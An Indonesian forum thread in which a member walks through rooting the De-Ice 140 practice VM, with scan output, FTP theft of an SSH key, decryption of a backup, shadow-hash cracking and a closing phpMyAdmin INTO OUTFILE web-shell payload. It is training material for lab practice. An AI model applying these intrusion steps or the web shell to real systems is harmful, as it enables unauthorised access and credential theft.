[Share] write up De-Ice 140 challenge (rooting linux)
#1
Wink 
halo halo kawan IBT ,,

dan akhirnya stelah struggling selama berhari hari  di sela sela kesibukan krja yang sangat padat, challenge De-Ice dari thread om @abdilahrf terselesaikan juga,,

saya sendiri g tau flag dari tantangan ini  ap,tapi bagi saya flagnya adalah ketika bisa mendaptkan akses root di mesin tersbut.. challenge ini bisa disebut penetrasi testing + linux privilege escalation dan jelas challenge ini bukan backgroundq, tapi tak ap??



but "I HAVE TO TRY to UNLOCK MY SKILL






mari kita saksikan bersama-sama Prof Of Concept. hahahahaha ...............

De-Ice ini adalah De-Ice seri 140 dari 5 seri lainya,, seri 140 adlah tantangan De-Ice yang terbaru,yang menurut

saya banyak "curve ball" ya De-Ice saya runing di virtual box

pertama tama kita scan jaringan




Code:
Currently scanning: Finished!   |   Screen View: Unique Hosts

2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 120
_____________________________________________________________________________
  IP            At MAC Address      Count  Len   MAC Vendor
-----------------------------------------------------------------------------
192.168.56.100  08:00:27:9f:ab:97    01    060   CADMUS COMPUTER SYSTEMS
192.168.56.101  08:00:27:27:d3:53    01    060   CADMUS COMPUTER SYSTEMS


dan ip address target mesin adalah 192.168.56.101. then kita enumeration target dengan menggunakan NMAP "the magic tool" hihihi



Code:
root@5h!n0b!:~# nmap -A -T4 -sV 192.168.56.101

Starting Nmap 6.45 ( http://nmap.org ) at 2014-10-20 10:34 EDT
Nmap scan report for 192.168.56.101
Host is up (0.00034s latency).
Not shown: 993 filtered ports
PORT    STATE  SERVICE  VERSION
21/tcp  open   ftp      ProFTPD 1.3.4a
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: ERROR
22/tcp  open   ssh      OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 f3:1d:45:3e:f2:38:2f:dc:27:50:8e:b6:78:d5:c4:d2 (DSA)
|   2048 e8:c6:de:08:ee:ab:54:fc:1a:06:62:50:e3:5b:37:22 (RSA)
|_  256 31:22:3f:46:d5:9f:da:43:13:55:2c:49:69:b2:9e:59 (ECDSA)
80/tcp  open   http     Apache httpd 2.2.22 ((Ubuntu) mod_ssl/2.2.22 OpenSSL/1.0.1)
443/tcp open   ssl/http Apache httpd 2.2.22 ((Ubuntu) mod_ssl/2.2.22 OpenSSL/1.0.1)
|_http-title: Lazy Admin Corp.
| ssl-cert: Subject: commonName=webhost
| Not valid before: 2014-10-20T09:27:22+00:00
|_Not valid after:  2024-10-17T09:27:22+00:00
|_ssl-date: 2014-10-20T10:35:23+00:00; -4h00m02s from local time.
465/tcp closed smtps
993/tcp open   ssl/imap Dovecot imapd
|_imap-capabilities: more have OK LOGIN-REFERRALS post-login LITERAL+ listed capabilities IMAP4rev1 Pre-login AUTH=PLAIN IDLE ENABLE AUTH=LOGINA0001 $
| ssl-cert: Subject: commonName=webhost
| Not valid before: 2014-10-20T09:27:22+00:00
|_Not valid after:  2024-10-17T09:27:22+00:00
|_ssl-date: 2014-10-20T10:35:23+00:00; -4h00m02s from local time.
995/tcp open   ssl/pop3 Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN LOGIN) TOP PIPELINING CAPA USER RESP-CODES UIDL
| ssl-cert: Subject: commonName=webhost
| Not valid before: 2014-10-20T09:27:22+00:00
|_Not valid after:  2024-10-17T09:27:22+00:00
|_ssl-date: 2014-10-20T10:35:23+00:00; -4h00m02s from local time.
MAC Address: 08:00:27:27:D3:53 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.0, Linux 3.0 - 3.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.34 ms 192.168.56.101
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 37.70 seconds


port 80, http menarik untuk di selidiki  gunakan firefox, ketika firefox dijalan kan,kita mendapatkan web page dari lazyadmin corp,setalah menilik dan mecermati page source i found nothing, next  kita scan directory web  tsebut, bisa mnggunakan dirb ato wfuzz





Code:
oot@5h!n0b!:wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/common.txt --hc 404 https://192.168.56.101/FUZZ/
********************************************************
* Wfuzz  2.0 - The Web Bruteforcer                     *
********************************************************
Target: https://192.168.56.101/FUZZ/
Payload type: file,/usr/share/wfuzz/wordlist/general/common.txt
Total requests: 950
==================================================================
ID     Response   Lines      Word         Chars          Request
==================================================================
00184:  C=403      8 L           22 W         210 Ch       " - cgi-bin"
00295:  C=403      8 L           22 W         206 Ch       " - doc"
00375:  C=200     97 L          525 W        7348 Ch       " - forum"
00424:  C=403      8 L           22 W         208 Ch       " - icons"
00624:  C=200    126 L          465 W        7540 Ch       " - phpmyadmin"
00913:  C=302      0 L            0 W           0 Ch       " - webmail"



untuk lebih menyakinkan dan memastikan, kita gunakan nikto untuk informasi gathering mendalam,

Code:
root@5h!n0b!:~# nikto -h https://192.168.56.101
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.101
+ Target Hostname:    192.168.56.101
+ Target Port:        443
---------------------------------------------------------------------------
+ SSL Info:        Subject: /CN=webhost
                  Ciphers: DHE-RSA-AES256-GCM-SHA384
                  Issuer:  /CN=webhost
+ Start Time:         2014-10-20 10:58:04 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu) mod_ssl/2.2.22 OpenSSL/1.0.1
+ Server leaks inodes via ETags, header found with file /, inode: 11996, size: 1782, mtime: Thu Apr 11 13:33:56 2013
+ The anti-clickjacking X-Frame-Options header is not present.
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ mod_ssl/2.2.22 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ OpenSSL/1.0.1 appears to be outdated (current is at least 1.0.1e). OpenSSL 0.9.8r is also current.
+ The Content-Encoding header is set to "deflate" this may mean that the server is vulnerable to the BREACH attack.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4$
+ Hostname '192.168.56.101' does not match certificate's CN 'webhost'
+ mod_ssl/2.2.22 OpenSSL/1.0.1 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. CVE-2002-0082, OS$
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Cookie PHPSESSID created without the secure flag
+ Cookie PHPSESSID created without the httponly flag
+ Cookie mlf2_usersettings created without the secure flag
+ Cookie mlf2_usersettings created without the httponly flag
+ Cookie mlf2_last_visit created without the secure flag
+ Cookie mlf2_last_visit created without the httponly flag
+ OSVDB-3092: /forum/: This might be interesting...

+ Cookie SQMSESSID created without the secure flag
+ Cookie SQMSESSID created without the httponly flag
+ OSVDB-3093: /webmail/src/read_body.php: SquirrelMail found
+ OSVDB-3233: /icons/README: Apache default file found.


nikto maupun wfuzz menemukan directory forum,phpmyadmin maupun webmail/Squirellmail webmail so just chek it dot page forum(myLittleforum) firefox on target 


[Image: 5klu7n.jpg]



[Image: 20semgh.jpg]





di salah satu topic di forum tertulis hacker attack,dan login attack dan sebagai catatan sandy swillard adalah juga raines, its look like good to see, setelah di telusuri dari thread. ternyata ada bruteforece ssh login,pusing jika harus mengamati 1 per 1, karena begitu banyak ya usrname dan pass,maka kita harus melihat mencari username dan passwrd yang pernah login via ssh,

so just copy paste all log tersebut dan gunakan sedikit bash script utuk menyortir/mencari passwrd
copy paste dan simpan log.txt




Code:
root@5h!n0b!:~# grep "invalid user" log.txt | cut -d" " -f9,11 | grep -v "invalid" | sort -u
!DFiuoTkbxtdk0!
adamsa
banterb
bbanter
benedictb
coffeec
genniege
longe
marym
michaelp
mmary
patrickp
pmichael
ppatrick
thompsont
tthompson




ada 17:1 kemungkinan password yang di gunakan,jikalaupu password ditemukan kita harus masih mencari username yang pernah login sukses dengan semua psswrd tsebtu, hanya mbrown yang sukses login dengan ssh, lihat line ke 6-7-8 dri SS dibawah




Mar 7 11:15:32 testbox sshd[5775]: Failed password for invalid user benedictb from 10.10.2.131 port 46963 ssh2


Mar 7 11:15:32 testbox sshd[5768]: Failed password for invalid user genniege from 10.10.2.131 port 46488 ssh2


Mar 7 11:15:32 testbox sshd[5775]: Received disconnect from 10.10.2.131: 1a1: Bye Bye [preauth]


Mar 7 11:15:32 testbox sshd[5768]: Received disconnect from 10.10.2.131: 11: Bye Bye [preauth]


Mar 7 11:15:32 testbox sshd[5774]: Connection from 10.0.0.23 port 35155


Mar 7 11:15:32 testbox sshd[5774]: Accepted keyboard-interactive/pam for mbrown from 10.0.0.23 port 35168 ssh2


Mar 7 11:15:32 testbox sshd[5774]: pam_unix(sshdConfusedession): session opened for user mbrown by (uid=0)



Mar 7 11:15:32 testbox sshd[5774]: User child is on pid 5776



Mar 7 11:15:32 testbox sshd[5788]: Set /proc/self/oom_score_adj to 0


Mar 7 11:15:32 testbox sshd[5789]: Set /proc/self/oom_score_adj to 0


Mar 7 11:15:32 testbox sshd[5789]: Connection from 10.10.2.131 port 47972


Mar 7 11:15:32 testbox sshd[5788]: Connection from 10.10.2.131 port 47971



so kita coba connect ke ssh
Code:
root@5h!n0b!:~# ssh [email protected]
Permission denied (publickey).
root@5h!n0b!:~# ssh [email protected] - i !DFiuoTkbxtdk0!
bash: !DFiuoTkbxtdk0!: event not found
root@5h!n0b!:~#



its Failed, keliatan ya memrlukan public key untuk login, sejujurya sempat disini mentok untuk 2 hari, i dont know where if to go ..


ketika login via ftp, juga useless nothing important inside,

sejenak berfikir ............. after 2 days 

tersadar bahwa aku sangat BODOOOOOHH,,, kenapa g login ke forum saja, dengan user mbrown dan passwrds/credential yg sudah ditemukan  

setelah menlihat2 profil mbrown tertulis email [email protected] dengan nama mark brown masih kita ingat nikto menemukan directory /webmail so just try on this login dengan email [email protected] dan dengn pass yang sama,



[Image: sbiwlh.jpg]





here we go we on it,chek inbok to find the other credental information.

dan ditemukan user dan pass mysql/phpmyadmin



Code:
From:   [email protected]
Subject:
Date:   Sun, March 10, 2013 10:23 am
To:     [email protected]

Hi,

here are the login-informations for mysql:

Username: root
Password: S4!y.dk)j/_d1pKtX1

Regards,
Sandy






[Image: 11m5h5j.jpg]


setelah beberapa lama mengexplore isi database, nampak nama user passowrd(hash) beserta emailnya,, its time to crack the password with stupid way,, just copy paste in google,




[Image: nr0vut.jpg]






dan stelah pass ter crack tum-ti-tum aku belum bisa login via ssh karen blum puya public key,so kita mencoba login via ftp dengan user dan passw, tujuan pertama adalah mencari publickey untuk login ssh.


setelah login, masuk ke dir: ftp/incoming ada file yang 
ternkripsi backup_webhost_130111.tar.gz.enc

sure, kita g akan bisa membuka tanpa menemukan passwry, kembali ke tujuan adlah mencari


public key,, setelah beberapa saat mencari, di salah satu folder mbrown/.ssh ditemukan

downloadkey,yang kemungkinan adalah id_rsa ya



Code:
root@5h!n0b!:~# ftp 192.168.56.101

Connected to 192.168.56.101.
220 ProFTPD 1.3.4a Server (LazyAdmin corp.) [192.168.56.101]
Name (192.168.56.101:root): rhedley
331 Password required for rhedley
Password:
230 User rhedley logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
257 "/rhedley" is the current directory
ftp> cd ..
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxr-x   1 root     root           60 May 13  2013 ftp
drwxrwx---   1 mbrown   mbrown         60 Mar 24  2013 mbrown
drwxrwx---   1 mparker  mparker        40 Apr 11  2013 mparker
drwxrwx---   2 rhedley  rhedley        87 Mar 24  2013 rhedley
drwxr-xr-x   2 1000     1000           36 May 12  2013 sraines
drwxrwx---   5 swillard swillard      128 May 12  2013 swillard
226 Transfer complete
ftp> cd ftp
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
d-wxrwx-wx   1 ftp      ftpadmin       60 Oct 20 14:33 incoming
226 Transfer complete

ftp> cd incoming
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
--w-rwx-w-   1 ftp      ftpuser     47984 Jan 11  2013 backup_webhost_130111.tar.gz.enc
226 Transfer complete
ftp> get backup_webhost_130111.tar.gz.enc
local: backup_webhost_130111.tar.gz.enc remote: backup_webhost_130111.tar.gz.enc
200 PORT command successful
150 Opening BINARY mode data connection for backup_webhost_130111.tar.gz.enc (47984 bytes)
226 Transfer complete
47984 bytes received in 0.00 secs (172277.1 kB/s)
ftp> ls
ftp> ls

200 PORT command successful
150 Opening ASCII mode data connection for file list
--w-rwx-w-   1 ftp      ftpuser     47984 Jan 11  2013 backup_webhost_130111.tar.gz.enc
226 Transfer complete
ftp> cd ..
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
d-wxrwx-wx   1 ftp      ftpadmin       60 Oct 20 14:33 incoming
226 Transfer complete
ftp> cd ..
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxr-x   1 root     root           60 May 13  2013 ftp
drwxrwx---   1 mparker  mparker        40 Apr 11  2013 mparker

drwxrwx---   2 rhedley  rhedley        87 Mar 24  2013 rhedley
drwxr-xr-x   2 1000     1000           36 May 12  2013 sraines
drwxrwx---   5 swillard swillard      128 May 12  2013 swillard
226 Transfer complete
ftp> cd mbrown
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
226 Transfer complete
ftp> cd mbrown/.ssh
550 mbrown/.ssh: No such file or directory
ftp> cd ..
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxr-x   1 root     root           60 May 13  2013 ftp
drwxrwx---   1 mbrown   mbrown         60 Mar 24  2013 mbrown
drwxrwx---   1 mparker  mparker        40 Apr 11  2013 mparker
drwxrwx---   2 rhedley  rhedley        87 Mar 24  2013 rhedley
drwxr-xr-x   2 1000     1000           36 May 12  2013 sraines
drwxrwx---   5 swillard swillard      128 May 12  2013 swillard
226 Transfer complete
ftp> cd mbrown/.ssh
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 mbrown   mbrown       1675 Mar 10  2013 downloadkey
-rw-------   1 mbrown   mbrown       1675 Mar 10  2013 id_rsa

-rw-r--r--   1 mbrown   mbrown        396 Mar 10  2013 id_rsa.pub
226 Transfer complete
ftp> get downloadkey
local: downloadkey remote: downloadkey
200 PORT command successful
150 Opening BINARY mode data connection for downloadkey (1675 bytes)
226 Transfer complete
1675 bytes received in 0.00 secs (1891.0 kB/s)
ftp> exit
221 Goodbye.


next  merubah permision ya , dan siap untuk login


[Image: 11j6wev.jpg]



kita explore lagi shell tersebut,dan setelah mengutik-ngutik dan melihat lihat ada file yang mencurigakan,yang g bisa di "read" karena mbrown tidak mempunyai "read access", gunakan getfacl untuk melihat yang mempunyai "read access"

ftp admin ternyata yg mempunyai "read access"



Code:
mbrown@webhost:/opt$ ls -l
total 4
-rwxrw----+ 1 root root 654 May 13  2013 backup.sh
mbrown@webhost:/opt$ getfacl backup.sh
# file: backup.sh
# owner: root
# group: root
user::rwx
group::rw-
group:ftpadmin:r--
mask::rw-
other::---




dan ftpadminya adalah rhedley dan swillard


Code:
mbrown@webhost:/$ cat /etc/group
root:x:0:
daemon:x:1:
fax:x:21:
voice:x:22:
cdrom:x:24:
floppy:x:25:
tape:x:26:
sudo:x:27:swillard
audio:x:29:
dip:x:30:
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46
ftpuser:x:997:rhedley,mbrown,ftp
ftpadmin:x:999:rhedley,swillard
sshlogin:x:998:swillard,mbrown





kita mencoba login ssh dari "mbrown shell" ke "rhedley shell"

keetika mencoba login ssh dari rhedley permission denied

dan kita mendpatkan shell lain ketika login ke swillard, langsung access backup.sh






Code:
mbrown@webhost:~$ ssh rhedley@localhost
Permission denied (publickey).

mbrown@webhost:~$ ssh swillard@localhost
swillard@webhost:~$

swillard@webhost:~$ cat /opt/backup.sh
#!/bin/bash
## Backup Script
## by SRaines
## Lazy Admin Corp
TMPBACKUP="/tmp/backup";

 
NAME_PREFIX="backup";
NAME_DATE=$(date +%y%m%d);
NAME_HOST=$(/bin/hostname);
FILENAME=${NAME_PREFIX}_${NAME_HOST}_${NAME_DATE}.tar;

[ ! -d ${TMPBACKUP} ] && mkdir -p ${TMPBACKUP}

tar cpf ${TMPBACKUP}/${FILENAME} /etc/fstab /etc/apache2 /etc/hosts /etc/motd /etc/ssh/sshd_config /etc/dovecot /etc/postfix /var/www /home /opt

gzip --best -f ${TMPBACKUP}/${FILENAME}

openssl aes-256-cbc -in ${TMPBACKUP}/${FILENAME}.gz -out ${TMPBACKUP}/${FILENAME}.gz.enc -pass pass:wpaR9V616xrDTy98L7Uje2DDU5hWtWhs

mv ${TMPBACKUP}/${FILENAME}.gz.enc ./

rm -fr ${TMPBACKUP}
swillard@webhost:~$





ternyata di backup.sh tersimpan password untuk membuka backup_webhost_130111.tar.gz.enc yang kita dapat dari ftp tadi komplit dengan command ya ...




Code:
root@5h!n0b!:~# openssl aes-256-cbc -in backup_webhost_130111.tar.gz.enc -out backup_webhost.tar.gz -pass pass:wpaR9V616xrDTy98L7Uje2DDU5hWtWhs

root@5h!n0b!:~# file backup_webhost_130111.tar.gz
backup_webhost_130111.tar.gz: gzip compressed data, was "backup_webhost_130111.tar", from Unix, last modified: Fri Jan 11 17:42:00 2013, max compress$

root@5h!n0b!:~# tar xvzf backup_webhost_130111.tar.gz
etc/
etc/ssh/
etc/ssh/moduli
etc/ssh/ssh_import_id
etc/ssh/ssh_config
etc/ssh/sshd_config
etc/shadow-
etc/security/
etc/security/namespace.init
etc/security/namespace.conf
etc/security/opasswd
etc/security/group.conf
etc/security/access.conf
etc/security/sepermit.conf
etc/security/limits.conf

etc/security/namespace.d/
etc/security/pam_env.conf
etc/security/time.conf
etc/security/capability.conf
etc/security/limits.d/

root@5h!n0b!:~/etc# ls
fstab     gconf  group   grub.d  pass.txt  sasldb2    security  sgml    shadow-  skel  su-to-rootrc  sudoers.d    sysctl.d
gai.conf  groff  group-  hosts   passwd    securetty  services  shadow  shells   ssh   sudoers       sysctl.conf  systemd
root@5h!n0b!:~/etc# cat shadown
cat: shadown: No such file or directory
root@5h!n0b!:~/etc# cat shadow
root:!:15773:0:99999:7:::
daemon:*:15773:0:99999:7:::
bin:*:15773:0:99999:7:::
sync:*:15773:0:99999:7:::

games:*:15773:0:99999:7:::
man:*:15773:0:99999:7:::
lp:*:15773:0:99999:7:::
mail:*:15773:0:99999:7:::
news:*:15773:0:99999:7:::
uucp:*:15773:0:99999:7:::
proxy:*:15773:0:99999:7:::
www-data:*:15773:0:99999:7:::
backup:*:15773:0:99999:7:::
list:*:15773:0:99999:7:::
irc:*:15773:0:99999:7:::
gnats:*:15773:0:99999:7:::
nobody:*:15773:0:99999:7:::
libuuid:!:15773:0:99999:7:::
syslog:*:15773:0:99999:7:::
messagebus:*:15773:0:99999:7:::
whoopsie:*:15773:0:99999:7:::
landscape:*:15773:0:99999:7:::
mysql:!:15773:0:99999:7:::
sshd:*:15773:0:99999:7:::
sraines:$6$4S0pqZzV$t91VbUY8ActvkS3717wllrv8ExZO/ZSHDIakHmPCvwzedKt2qDRh7509Zhk45QkKEMYPPwP7PInpp6WAJYwvk1:15773:0:99999:7:::
mbrown:$6$DhcTFbl/$GcvUMLKvsybo4uXaS6Wx08rCdk6dPfYXASXzahAHlgy8A90PfwdoJXXyXZluw95aQeTGrjWF2zYPR0z2bX4p31:15773:0:99999:7:::
rhedley:$6$PpzRSzPO$0MhuP.G1pCB3Wc1zAzFSTSnOnEeuJm5kbXUGmlAwH2Jz1bFJU/.ZPwsheyyt4hrtMvZ/k6wT38hXYZcWY2ELV/:15773:0:99999:7:::


lalu langlah terkahir adalah crack password ketika admin tersbut, ketika kasus ini saya  crack menggunakan john dengan combinasi darkc0de.lst bisa dilihat berapa lama dan betapa berat perjuanganya untuk mendaptkan password root


dan akhirnya sudah setelah hampir 4 jam password ter cracking ....




[Image: 2m4dee0.jpg]





[Image: 2nkj88z.jpg]



GAME OVER 
mission complete






NEED TO KNOW:



1. perjalanan untuk mendapatkan root access sebenarya lebih complicated,

    write up ini ditulis dengan ringkas untuk mudah dipahami dan dipelajari.



2. sudah banyak exploit dicoba, dari exploit mylittle forum maupun linux kernel ternyata

    bayak yang tidak bekerja dengan baik.



3. trik untuk mendapatkan akses shell lainya, bisa meggunakan php code execution di    
    Phpmyadmin  (SELECT " < ? system($_REQUEST['cmd']); ? > " INTO OUTFILE  

    "/var/www/template_c/cmd.php" dengan bantuan netcat untuk mendapatkan interactive       shell,,


4. pertanyaan untuk kita semua 
    " HAVE YOU TRIED HARDER !! to UNLOCK YOUR SKILL klo belum ya harus     
    dicoba .. dan selamt mencoba jangan lupa siapakn bodrex ato poldanmig        
    ha...ha...ha..ha



5. karena ane "wong solo" Write up dedikasikan buat reginal solo yang belum terbentuk   

    ha..ha..ha..ha..ha berharap semoga cepat terbentuk 





thanks for read my write up De-Ice challenge 104, jika ada pertayaan do not hesitate to contact/add me here
cara yang salah memperingati hari kartini, contohlah jiwa nasionalisme ya dan emansipasinya, bukan cara berpakainya.

#2
Ajiiibbb kangggg....mantappppp......patut di coba nih game.a... Nice share kang...

#3
wah,... enak ini menu jam pocong,.. dari pada nganggur,... :v
nice share bro....
+ dari ane,.. Big Grin

#4
Widih.. ngeri dah.. bro ini mantap kali perjalanannya dari belum dapet passnya sampai kena (y) Big Grin

#5
Keren om Big Grin
ane juga mau coba laah,, hehe mau belajar tentang ctf lebih lanjut Big Grin

#6
postingannya ane angkat ke blog jabodetabek ya Big Grin ,, keren (Y)






Users browsing this thread: 1 Guest(s)